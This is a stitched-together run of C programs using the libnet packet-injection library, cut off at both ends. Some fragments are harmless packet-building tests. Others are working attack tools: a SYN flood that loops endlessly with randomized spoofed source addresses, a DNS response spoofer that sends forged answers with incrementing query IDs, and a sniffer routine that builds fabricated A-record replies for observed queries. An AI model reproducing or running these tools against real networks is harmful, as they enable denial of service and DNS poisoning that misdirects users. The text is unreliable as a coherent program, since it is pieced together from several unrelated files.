0, // ip options
packet // pointer to packet buffer
);
// Build UDP packet?
if(!strcmp(type,"udp"))
{
libnet_build_udp(ntohs(SPORT), // Source port
ntohs(DPORT), // destination port
payload, // pointer to packet payload
p_size, // payload size
packet+LIBNET_IP_H // pointer to packet buffer
);
printf("Sending UDP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT);
}
// Build TCP/IP packet per default
else
{
// Build tcp header
libnet_build_tcp(ntohs(SPORT), // source port
ntohs(DPORT), // destination port
1000000000, // acknowledge number
1000000000, // sequence number
TH_ACK, // tcp flags
1024, // window size
0, // urgent pointer
payload, // pointer to packet payload
p_size, // payload size
packet+LIBNET_IP_H // pointer to the packet buffer
);
printf("Sending TCP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT);
}
// Calculize checksum
libnet_do_checksum(packet,IPPROTO_TCP,LIBNET_IP_H+LIBNET_TCP_H+p_size);
// Get the packet on the wire
send = libnet_write_ip(sock,packet,LIBNET_IP_H+LIBNET_TCP_H+p_size);
// was the complete packet send over the wire?
if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size)
{
printf("error while writing packet into the socket...\n");
}
// close the socket
libnet_close_raw_sock(sock);
}
// free the memory
//libnet_destroy_packet(packet);
free(payload);
free(errbuff);
return 1;
}
int
main(int argc, char **argv)
{
int sock, c;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char *cp, *buf;
printf("UDP packet building/writing test\n");
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
while((c = getopt(argc, argv, "d:s:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if (!(dst_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if (!(src_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(1);
}
break;
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
buf = malloc(LIBNET_UDP_H + LIBNET_IP_H);
if (!buf)
{
perror("No memory for packet header");
exit(EXIT_FAILURE);
}
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1)
{
perror("No socket");
exit(EXIT_FAILURE);
}
libnet_build_ip(LIBNET_UDP_H,
0,
242,
0,
64,
IPPROTO_UDP,
src_ip,
dst_ip,
NULL,
0,
buf);
libnet_build_udp(src_prt, dst_prt, NULL, 0, buf + LIBNET_IP_H);
libnet_do_checksum(buf, IPPROTO_UDP, LIBNET_UDP_H);
c = libnet_write_ip(sock, buf, LIBNET_UDP_H + LIBNET_IP_H);
if (c < LIBNET_UDP_H + LIBNET_IP_H)
{
fprintf(stderr, "libnet_write_ip\n");
}
printf("Completed, wrote %d bytes\n", c);
free(buf);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
main(int argc, char *argv[])
{
int c;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char *cp;
char errbuf[256];
char *device = NULL;
struct libnet_link_int *l;
printf("link layer TCP packet building/writing test\n");
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
while ((c = getopt(argc, argv, "i:d:s:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if (!(dst_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if (!(src_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(1);
}
break;
case 'i':
device = optarg;
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt || !device)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
if ((l = libnet_open_link_interface(device, errbuf)) == NULL)
{
fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf);
exit(EXIT_FAILURE);
}
c = send_tcp(l, device, src_ip, src_prt, dst_ip, dst_prt);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
int sock, n, c, p_num;
struct libnet_arena arena, *arena_p;
u_char *packets[10];
u_long src_ip, dst_ip;
printf("ICMP_ECHO / Arena allocator test\n");
src_ip = 0;
dst_ip = 0;
while((c = getopt(argc, argv, "d:s:")) != EOF)
{
switch (c)
{
case 'd':
if (!(dst_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(1);
}
break;
case 's':
if (!(src_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(1);
}
break;
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
arena_p = &arena;
p_num = 10;
if (libnet_init_packet_arena(&arena_p, p_num, LIBNET_ICMP_ECHO_H +
LIBNET_IP_H) == -1)
{
fprintf(stderr, "libnet_init_packet_arena failed\n");
exit(EXIT_FAILURE);
}
else
{
printf("Allocated an arena of %ld bytes..\n",
LIBNET_GET_ARENA_SIZE(arena));
}
/*
* Open our raw IP socket and set IP_HDRINCL.
*/
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1)
{
perror("No socket");
exit(EXIT_FAILURE);
}
for (n = 0; n < p_num; n++)
{
printf("%ld bytes remaining in arena\n",
LIBNET_GET_ARENA_REMAINING_BYTES(arena));
packets[n] = libnet_next_packet_from_arena(&arena_p,
LIBNET_ICMP_ECHO_H + LIBNET_IP_H);
if (!packets[n])
{
fprintf(stderr, "Arena is empty\n");
continue;
}
/*
* Build the IP header (shown exploded for commenting).
*/
libnet_build_ip(LIBNET_ICMP_ECHO_H, /* Size of the payload */
IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */
242, /* IP ID */
0, /* Frag stuff */
48, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
packets[n]); /* Packet header memory */
/*
* Build the ICMP header.
*/
libnet_build_icmp_echo(ICMP_ECHO, /* type */
0, /* code */
242, /* id */
1, /* seq */
NULL, /* pointer to payload */
0, /* size of payload */
packets[n] + LIBNET_IP_H); /* packet header memory */
if (libnet_do_checksum(packets[n], IPPROTO_ICMP, LIBNET_ICMP_ECHO_H)
== -1)
{
fprintf(stderr, "Can't do checksum!\n");
}
/*
* Write the packet to the network.
*/
c = libnet_write_ip(sock, packets[n], LIBNET_ICMP_ECHO_H + LIBNET_IP_H);
if (c < LIBNET_ICMP_ECHO_H + LIBNET_IP_H)
{
fprintf(stderr, "write_ip\n");
}
printf("Completed %d of %d, wrote %d bytes\n", n + 1, p_num, c);
}
libnet_destroy_packet_arena(&arena_p);
/* Blah. */
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int main (int argc, char **argv) {
u_long src_ip, /* source address */
dst_ip; /* destination address */
u_short src_port, /* source port */
dst_port, /* destination port */
id; /* dns id we are spoofing */
int i, /* loop counter */
written_bytes, /* number of bytes written */
packet_size, /* size of our packet */
payload_size, /* size of our payload */
npackets, /* num of packet to write */
socket; /* socket to write on */
u_char *packet, /* we build this */
*payload; /* we send this */
if (argc < 7) {
printf("\nusage: answer_dns <source_ip> <port> <destination_ip> <port> <dns_id> <#_packets>\n");
exit (EXIT_FAILURE);
}
if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");
src_ip = libnet_name_resolve(argv[1], 0);
dst_ip = libnet_name_resolve(argv[3], 0);
src_port = (u_short) atoi(argv[2]);
dst_port = (u_short) atoi(argv[4]);
id = (u_short) atoi(argv[5]);
npackets = (int) atoi(argv[6]);
payload = /* question section name/types, size: 21 */
"\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"
/* answer section, names/types, size: 21 */
"\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"
/* answer section, ttl, size: 4 */
"\xff\xff\xff\xff"
/* answer section, rdata length, size: 2 */
"\x00\x04"
/* answer section, rdata, size: 4 */
"\x81\x51\xe0\x43";
payload_size = 52;
/*
* packet memory allocation
*/
packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
libnet_init_packet(packet_size, &packet);
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
/*
* ip header construction
*/
libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
0, /* ip tos */
10951, /* ip id */
0, /* fragmentation bits */
64, /* ttl */
IPPROTO_UDP, /* protocol */
src_ip, /* source address */
dst_ip, /* destination address */
NULL, /* payload */
0, /* payload length */
packet); /* packet buffer */
/*
* udp header construction
* during debugging i found that we weren't generating the correct
* length here, that is why a payload length is included (payload + dns_header)
* it really shouldn't be here though
*/
libnet_build_udp(src_port, /* source port */
dst_port, /* destination port */
NULL, /* payload */
payload_size + 12, /* payload length */
packet + LIBNET_IP_H);
/*
* write npackets
* we loop from here because we must change the dns id and also re-checksum
*/
printf("\nwriting packets");
for (i = 0; i < npackets; i++) {
printf(".");
/*
* dns header construction
*/
libnet_build_dns(id+i, /* dns id */
0x8180, /* control flags */
1, /* number of questions */
1, /* number of answer RR's */
0, /* number of authority RR's */
0, /* number of additional RR's */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_IP_H + LIBNET_UDP_H);
/*
* calculate checksum
*/
libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
/*
* write packet
*/
written_bytes = libnet_write_ip(socket, packet, packet_size);
/*
* make sure the number of written bytes jives with what we expect
*/
if (written_bytes < packet_size)
libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);
}
/*
* cleanup
*/
libnet_destroy_packet(&packet);
if (libnet_close_raw_sock(socket) == -1)
libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
printf("\n");
return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト
dest_port = (u_short) atoi(argv[2]); // ポート番号
network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // 乱数生成器に種を与える
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // 永久ループ(CTRL-Cで終了されるまで)
{
libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化)
0, // 断片化
libnet_get_prand(LIBNET_PR8), // TTL (乱数化)
IPPROTO_TCP, // トランスポートプロトコル
libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化)
dest_ip, // 宛先IP
NULL, // ペイロード(なし)
0, // ペイロード長
packet); // パケットヘッダメモリ
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化)
dest_port, // 宛先TCPポート
libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化)
libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化)
TH_SYN, // コントロールフラグ (SYNフラグのみ設定)
libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化)
0, // 至急ポインタ
NULL, // ペイロード (なし)
0, // ペイロード長
packet + LIBNET_IP_H); // パケットヘッダメモリ
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する
}
libnet_destroy_packet(&packet); // パケットメモリを解放する
if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
int
main(int argc, char **argv)
{
int sock, c;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char *cp, *buf;
u_char *payload = "hello world";
u_char *options = " This here is a 40-byte IP option list.";
int payload_s = strlen(payload);
int option_s = strlen(options);
struct ipoption ipopt;
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
printf("IP + options and TCP + payload packet building/writing test\n");
while((c = getopt(argc, argv, "d:s:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if (!(dst_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if (!(src_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* Get packet memory. Let's get plenty.
*/
buf = malloc(IP_MAXPACKET);
if (!buf)
{
perror("No memory for packet");
exit(EXIT_FAILURE);
}
/*
* Open our raw IP socket and set IP_HDRINCL.
*/
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1)
{
perror("No socket");
exit(EXIT_FAILURE);
}
/*
* Build the IP header (shown exploded for commenting).
*/
libnet_build_ip(LIBNET_TCP_H + payload_s,/* Size of the payload */
0, /* IP tos */
242, /* IP ID */
0, /* Frag stuff */
48, /* TTL */
IPPROTO_TCP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
buf); /* Packet header memory */
/*
* Build the TCP header.
*/
libnet_build_tcp(src_prt, /* Source TCP port */
dst_prt, /* Destination TCP port */
11111, /* Sequence number */
99999, /* Acknowledgement number */
TH_SYN|TH_ACK, /* Control flags */
1024, /* Window size */
0, /* Urgent pointer */
payload, /* Pointer to payload */
payload_s,
buf + LIBNET_IP_H); /* Packet header memory */
/*
* Calculate the TCP header checksum (IP header checksum is *always* done
* by the kernel.
*/
libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H + payload_s);
memcpy(ipopt.ipopt_list, options, option_s);
*(ipopt.ipopt_list) = IPOPT_SECURITY;
*(ipopt.ipopt_list + 1) = 1;
/*
* Insert the IP options.
*/
c = libnet_insert_ipo(&ipopt, /* pointer to ipopt struct */
option_s, /* Length of option list */
buf); /* Packet header memory */
if (c == -1)
{
fprintf(stderr, "Can't add options, discarding them.\n");
}
/*
* Write the packet to the network.
*/
c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H + payload_s
+ option_s);
if (c < LIBNET_TCP_H + LIBNET_IP_H + payload_s + option_s)
{
fprintf(stderr, "libnet_write_ip: %s\n", strerror(errno));
}
printf("Completed, wrote %d bytes\n", c);
free(buf);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int
main(int argc, char *argv[])
{
extern char *optarg;
extern int optind;
int c, i;
struct libnet_link_int *llif;
char ebuf[PCAP_ERRBUF_SIZE];
u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN];
in_addr_t src, dst;
u_short sport, dport;
u_int32_t seq;
u_char pkt[ETH_H + IP_H + TCP_H];
while ((c = getopt(argc, argv, "vs:d:e:x:y:i:n:h?V")) != -1) {
switch (c) {
case 'v':
break;
case 's':
Src = libnet_name_resolve(optarg, 0);
break;
case 'd':
Dst = libnet_name_resolve(optarg, 0);
break;
case 'e':
Tha = (u_char *)ether_aton(optarg);
break;
case 'x':
Sport = atoi(optarg);
break;
case 'y':
Dport = atoi(optarg);
break;
case 'i':
Intf = optarg;
break;
case 'n':
Repeat = atoi(optarg);
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (argc != 0)
usage();
if (!Intf && (Intf = pcap_lookupdev(ebuf)) == NULL)
errx(1, "%s", ebuf);
if ((llif = libnet_open_link_interface(Intf, ebuf)) == 0)
errx(1, "%s", ebuf);
libnet_seed_prand();
for (i = 0; i != Repeat; i++) {
gen_mac(sha);
if (Tha == NULL) gen_mac(tha);
else memcpy(tha, Tha, sizeof(tha));
if (Src != 0) src = Src;
else src = libnet_get_prand(PRu32);
if (Dst != 0) dst = Dst;
else dst = libnet_get_prand(PRu32);
if (Sport != 0) sport = Sport;
else sport = libnet_get_prand(PRu16);
if (Dport != 0) dport = Dport;
else dport = libnet_get_prand(PRu16);
seq = libnet_get_prand(PRu32);
libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, pkt);
libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 64,
IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H);
libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512,
0, NULL, 0, pkt + ETH_H + IP_H);
libnet_do_checksum(pkt + ETH_H, IPPROTO_IP, IP_H);
libnet_do_checksum(pkt + ETH_H, IPPROTO_TCP, TCP_H);
if (libnet_write_link_layer(llif, Intf, pkt, sizeof(pkt)) < 0)
errx(1, "write");
fprintf(stderr, "%s ",
ether_ntoa((struct ether_addr *)sha));
fprintf(stderr, "%s %s.%d > %s.%d: S %u:%u(0) win 512\n",
ether_ntoa((struct ether_addr *)tha),
libnet_host_lookup(Src, 0), sport,
libnet_host_lookup(Dst, 0), dport, seq, seq);
}
exit(0);
}
int
main(int argc, char **argv)
{
int sock, c;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
u_char *cp, *buf;
printf("TCP packet building/writing test\n");
src_ip = 0;
dst_ip = 0;
src_prt = 0;
dst_prt = 0;
while((c = getopt(argc, argv, "d:s:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
dst_prt = (u_short)atoi(cp);
if (!(dst_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if (!(cp = strrchr(optarg, '.')))
{
usage(argv[0]);
}
*cp++ = 0;
src_prt = (u_short)atoi(cp);
if (!(src_ip = libnet_name_resolve(optarg, 1)))
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
}
}
if (!src_ip || !src_prt || !dst_ip || !dst_prt)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* Get our block of memory for the packet. In this case, we only need
* memory for the packet headers.
*/
buf = malloc(IP_MAXPACKET);
if (!buf)
{
perror("No memory for packet header");
exit(EXIT_FAILURE);
}
/*
* Open our raw IP socket and set IP_HDRINCL.
*/
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1)
{
perror("No socket");
exit(EXIT_FAILURE);
}
/*
* Build the IP header (shown exploded for commenting).
*/
libnet_build_ip(LIBNET_TCP_H, /* Size of the payload */
IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */
242, /* IP ID */
0, /* Frag stuff */
48, /* TTL */
IPPROTO_TCP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
buf); /* Packet header memory */
/*
* Build the TCP header.
*/
libnet_build_tcp(src_prt, /* Source TCP port */
dst_prt, /* Destination TCP port */
11111, /* Sequence number */
99999, /* Acknowledgement number */
TH_SYN, /* Control flags */
1024, /* Window size */
0, /* Urgent pointer */
NULL, /* Pointer to payload (none) */
0,
buf + LIBNET_IP_H); /* Packet header memory */
/*
* Calculate the TCP header checksum (IP header checksum is *always* done
* by the kernel.
*/
libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H);
/*
* Write the packet to the network.
*/
c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H);
if (c < LIBNET_TCP_H + LIBNET_IP_H)
{
fprintf(stderr, "libnet_write_ip\n");
}
printf("Completed, wrote %d bytes\n", c);
free(buf);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
/******************************************************************************
* parse_dns *
* *
* take a packet and print it (verbose or not) *
* store relevant information in our cc struct *
* arg1: (char *) pointer to packet *
* arg2: (int) captured packet length *
* ret: none *
******************************************************************************/
void parse_dns (char *packet, int caplen) {
struct ip *ip; /* ip header */
struct udphdr *udp; /* udp header */
struct dnshdr *dns; /* dns header */
char *data, /* pointer to dns payload */
*data_backup, /* we modify data so keep orig */
name[128]; /* storage for lookup name */
u_long rdata; /* rdata in network byte order */
int datalen, /* length of dns payload */
c = 1, /* used in name extraction */
i; /* loop counter */
ip = (struct ip *) (packet + offset);
udp = (struct udphdr *) (packet + offset + LIBNET_IP_H);
dns = (struct dnshdr *) (packet + offset + LIBNET_IP_H + LIBNET_UDP_H);
data = (packet + offset + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H);
/*
* we modify the data pointer, so save the original position
*/
data_backup = data;
/*
* print dns packet source_address:port > destination_address:port
*/
printf("\ndns activity: %s:%d > ", inet_ntoa(ip->ip_src), ntohs(udp->uh_sport));
printf("%s:%d", inet_ntoa(ip->ip_dst), ntohs(udp->uh_dport));
/*
* clean out our name array and grab length of name to convert
*/
memset(name, '\0', sizeof(name));
datalen = strlen(data);
#if defined DEBUG
printf("\nDEBUG> datalen: %d", datalen);
#endif
/*
* convert name...
* dns names are of the form 3www7redhive3com
* we need to convert it to the more friendly www.redhive.com
*/
if (dn_expand((u_char *)dns, packet + caplen, data, name, sizeof(name)) < 0)
return;
/*
* restore the data pointer
*/
data = data_backup;
/* kill the trailing '.' */
name[datalen-1] = '\0';
/*
* are we looking at a question or an answer?
*/
if (htons(dns->qdcount) > 0 && htons(dns->ancount) == 0)
printf("\t[%s = ?]", name);
else if (htons(dns->ancount) > 0)
printf("\t[%s = real answer]", name);
/*
* what type of question is it?
*/
#if defined DEBUG
printf("\nDEBUG> data: %#x", *(data+datalen+2));
if ( ((int)*(data+datalen+2)) == T_A)
printf("\nDEBUG> type: A");
if ( ((int)*(data+datalen+2)) == T_PTR)
printf("\nDEBUG> type: PTR");
#endif
/*
* print more verbose packet information
*/
if (vflag) {
printf("\ndns id: %d", ntohs(dns->id));
printf("\nrecursion desired: %d", dns->rd);
printf("\ntruncated message: %d", dns->tc);
printf("\nauthoritive answer: %d", dns->aa);
printf("\nopcode: %d", dns->opcode);
printf("\nresponse flag: %d", dns->qr);
printf("\nresponse code: %d", dns->rcode);
printf("\nrecursion available: %d", dns->ra);
printf("\nnumber questions: %d", htons(dns->qdcount));
printf("\nnumber answers: %d", htons(dns->ancount));
printf("\nnumber authority: %d", htons(dns->nscount));
}
/* print seperator */
printf("\n--");
/*
* bake the chewycenter
*/
chewycenter.src_address = ip->ip_src.s_addr;
chewycenter.dst_address = ip->ip_dst.s_addr;
chewycenter.src_port = udp->uh_sport;
chewycenter.dst_port = udp->uh_dport;
chewycenter.dns_id = dns->id;
/*
* we only spoof packets from nameservers
* if the source of the question is not a client
* we don't waste any time building a packet, simply return
*/
if (ntohs(chewycenter.dst_port) != 53) {
return;
}
/*
* check the question type
* the question type is stored in the 2 bytes after the variables length name
* if the question is not of type A we return since we are only spoofing those type answers
*/
if ( ((int)*(data+datalen+2)) == T_A)
chewycenter.is_a = 1;
else {
chewycenter.is_a = 0;
return;
}
/*
* we start clean withno answer, also we set the current question
*/
chewycenter.current_answer = NULL;
strncpy(chewycenter.current_question, name, 128);
/*
* if there is a fabrication table search the list for an appropriate entry
*/
if (fflag)
chewycenter.current_answer = search_table(name);
/*
* if an entry was not found and a default address is specified use it
*/
if (!chewycenter.current_answer && dflag) {
chewycenter.current_answer = chewycenter.default_answer;
}
/*
* if an entry was not found and a default address is not specified then we ignore packet
*/
if (!chewycenter.current_answer && !dflag) {
chewycenter.have_answer = 0;
return;
}
/*
* if we've gotten this far it means that we have an answer to write
*/
chewycenter.have_answer = 1;
/*
* convert rdata from char * to something useable (unsigned long in network byte order)
*/
rdata = libnet_name_resolve(chewycenter.current_answer, 0);
/*
* build the payload
*
* payload format: (very rudimentary ascii diagram)
* +-------------------------------|----------------------|--------------+
* | variable length question name | 2 byte question type | 2 byte class |
* |-------------------------------|----------------------|--------------|
* | variable length answer name | 2 byte question type | 2 byte class |
* |-------------------------------|----------------------|--------------|
* | 4 byte time to live | 2 byte rdata length | 4 byte rdata |
* +-------------------------------|----------------------|--------------+
*
* good lord is this ugly, but it works
* 00 00 00 00 00 04 = 4 byte ttl + 2 byte rdata length
* rdata length is always 4, this is because we are only dealing with T_A
* hence rdata will always be a dotted quad
*/
memcpy(chewycenter.payload, data, datalen + 5);
memcpy(chewycenter.payload + datalen + 5, data, datalen + 5);
memcpy(chewycenter.payload + 2 * (datalen + 5), "\x00\x00\x00\x00\x00\x04", 6);
*((u_long *)(chewycenter.payload + 2 * (datalen + 5) + 6 + 0)) = rdata;
chewycenter.payload_size = 2 * (datalen + 5) + 10;
#if defined DEBUG
printf("\nDEBUG>\ndata [%d]: ", datalen);
for (i = 0; i < datalen+5; i++)
printf("%x ", data[i]);
printf("\n");
printf("\nDEBUG>\nchewycenter [%d]: ", chewycenter.payload_size);
for (i = 0; i < chewycenter.payload_size; i++)
printf("%x ", chewycenter.payload[i]);
printf("\n");
#endif
}
int main (int argc, char **argv) {
u_long src_ip, /* source address */
dst_ip; /* destination address */
u_short src_port, /* source port */
dst_port, /* destination port */
id; /* dns id we are spoofing */
int written_bytes, /* number of bytes written */
packet_size, /* size of our packet */
payload_size, /* size of our payload */
socket; /* socket to write on */
u_char *packet, /* we build this */
*payload; /* we send this */
if (argc < 6) {
printf("\nusage: ask_dns <source_ip> <port> <destination_ip> <port> <dns_id>\n");
exit (EXIT_FAILURE);
}
if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");
src_ip = libnet_name_resolve(argv[1], 0);
dst_ip = libnet_name_resolve(argv[3], 0);
src_port = (u_short) atoi(argv[2]);
dst_port = (u_short) atoi(argv[4]);
id = (u_short) atoi(argv[5]);
payload = "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01";
payload_size = 21;
/*
* packet memory allocation
*/
packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
libnet_init_packet(packet_size, &packet);
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
/*
* ip header construction
*/
libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
0, /* ip tos */
0, /* ip id */
0, /* fragmentation bits */
64, /* ttl */
IPPROTO_UDP, /* protocol */
src_ip, /* source address */
dst_ip, /* destination address */
NULL, /* payload */
0, /* payload length */
packet); /* packet buffer */
/*
* udp header construction
* during debugging i found that we weren't generating the correct
* length here, that is why a payload length is included (payload + dns_header)
* it really shouldn't be here though
*/
libnet_build_udp(src_port, /* source port */
dst_port, /* destination port */
NULL, /* payload */
33, /* payload length */
packet + LIBNET_IP_H);
/*
* dns header construction
*/
libnet_build_dns(id, /* dns id */
0x0100, /* control flags */
1, /* number of questions */
0, /* number of answer RR's */
0, /* number of authority RR's */
0, /* number of additional RR's */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_IP_H + LIBNET_UDP_H);
/*
* calculate checksum
*/
libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
/*
